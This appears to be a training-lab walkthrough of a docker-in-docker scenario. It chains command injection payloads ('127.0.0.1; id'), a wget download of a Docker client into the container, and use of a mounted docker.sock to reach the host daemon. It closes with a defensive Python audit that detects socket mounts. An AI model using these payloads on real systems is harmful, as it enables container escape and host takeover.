DIND (docker-in-docker) exploitation

Scenario Information

Many CI/CD and pipeline systems that use Docker to build containers for you within the pipeline rely on something called DIND (docker-in-docker), which means the build container gets access to a Docker daemon socket. In this scenario, we try to exploit that setup and gain access to the host system.

[Figure: Scenario 2 welcome]

Scenario Solution

  • By looking at the application functionality, identified that it has a command injection vulnerability
127.0.0.1; id

[Figure: Scenario 2 Command Injection]

  • After performing quite some analysis, identified that there is a docker.sock mount available in the file system
;mount

[Figure: Scenario 2 mount]

  • Download the static Docker client binary into the container
;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz
  • Extract the binary from the docker-19.03.9.tgz file
;tar -xvzf /tmp/docker-19.03.9.tgz -C /tmp/

[Figure: Scenario 2 extract binary]

  • Access the host system's Docker daemon by running the following docker commands through the mounted docker.sock
;/tmp/docker/docker -H unix:///custom/docker/docker.sock ps
;/tmp/docker/docker -H unix:///custom/docker/docker.sock images

[Figure: Scenario 2 list host containers]
[Figure: Scenario 2 list host images]
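The misconfiguration this scenario depends on is a build container whose hostPath volume exposes the Docker daemon socket. As an added example that is not part of the original write-up, the following Python audit walks a pod spec and reports every container mount that exposes the socket, either directly or through a parent directory such as /var/run; the sample pod, the container and volume names and the DOCKER_SOCKETS list (seeded with the default path and this scenario's /custom/docker/docker.sock) are constructed for the example.

```python
import posixpath

# Socket locations to look for: the Docker default plus the non-standard
# path this scenario uses. Extend with your own daemon's configuration.
DOCKER_SOCKETS = ("/var/run/docker.sock", "/custom/docker/docker.sock")

# Constructed pod spec resembling a DIND-style CI build pod (not real data).
SAMPLE_POD = {
    "metadata": {"name": "ci-build"},
    "spec": {
        "volumes": [
            {"name": "docker-sock", "hostPath": {"path": "/custom/docker/docker.sock"}},
            {"name": "workspace", "hostPath": {"path": "/srv/build"}},
            {"name": "run-dir", "hostPath": {"path": "/var/run/"}},
            {"name": "cache", "emptyDir": {}},
        ],
        "containers": [
            {"name": "build", "volumeMounts": [
                {"name": "docker-sock", "mountPath": "/custom/docker/docker.sock"},
                {"name": "workspace", "mountPath": "/workspace"}]},
            {"name": "sidecar", "volumeMounts": [
                {"name": "run-dir", "mountPath": "/host-run"},
                {"name": "cache", "mountPath": "/cache"}]},
        ],
    },
}

def exposes_docker_socket(host_path):
    """True if host_path is a Docker socket or a directory that contains one."""
    host_path = posixpath.normpath(host_path)
    if host_path.endswith("docker.sock"):
        return True
    prefix = host_path.rstrip("/") + "/"  # "/" stays "/", "/var/run" -> "/var/run/"
    return any(sock.startswith(prefix) for sock in DOCKER_SOCKETS)

def find_docker_socket_mounts(pod):
    """Return (container, volume, host_path, mount_path) for each risky mount."""
    spec = pod.get("spec", {})
    risky = {}  # volume name -> hostPath that exposes a socket
    for vol in spec.get("volumes", []):
        path = (vol.get("hostPath") or {}).get("path")
        if path and exposes_docker_socket(path):
            risky[vol["name"]] = path
    findings = []
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        for m in c.get("volumeMounts", []):
            if m.get("name") in risky:
                findings.append((c["name"], m["name"], risky[m["name"]], m.get("mountPath")))
    return findings
```

Running find_docker_socket_mounts(SAMPLE_POD) flags the build container's socket mount and the sidecar's /var/run mount, while the /srv/build and emptyDir volumes pass; an admission policy or CI linter can reject any pod for which the list is non-empty.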

Miscellaneous

TBD